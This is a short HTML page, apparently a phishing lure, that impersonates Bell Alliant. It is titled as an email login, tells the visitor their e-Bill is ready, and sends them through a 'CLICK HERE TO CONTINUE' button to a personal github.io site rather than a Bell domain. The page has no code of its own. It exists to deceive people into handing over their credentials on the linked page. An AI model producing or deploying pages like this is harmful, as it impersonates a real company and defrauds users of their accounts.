<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Bell Alliant Email Login</title>
    <link rel="icon" type="image/x-icon" href="./favicon.ico" />

    <style>
      body {
        margin: 0;
        height: 100vh;
        display: flex;
        justify-content: center;
        align-items: center;
        font-family: Arial, sans-serif;
        width: 100%;
      }
      .container {
        text-align: center;
      }
      h2 {
        font-size: 32px;
        margin: 16px 0;
      }
      button {
        padding: 10px 20px;
        font-size: 16px;
        cursor: pointer;
      }
      a {
      color: white; 
      background-color: black;
      text-decoration: none;
      padding: 10px 20px; 
      border-radius: 2px; 
      font-family: Arial, sans-serif; 
      font-size: 16px; 
      width: 100%;
      cursor: pointer;
    }
    </style>
  </head>
  <body>
    <div class="container">
      <img src="/bell img.png" alt="logo" />
      <h2>Your e-Bill is Ready for Review</h2>
      <a href="https://scoff-glitch.github.io/Bells/">CLICK HERE TO CONTINUE</a>
    </div>
  </body>
</html>
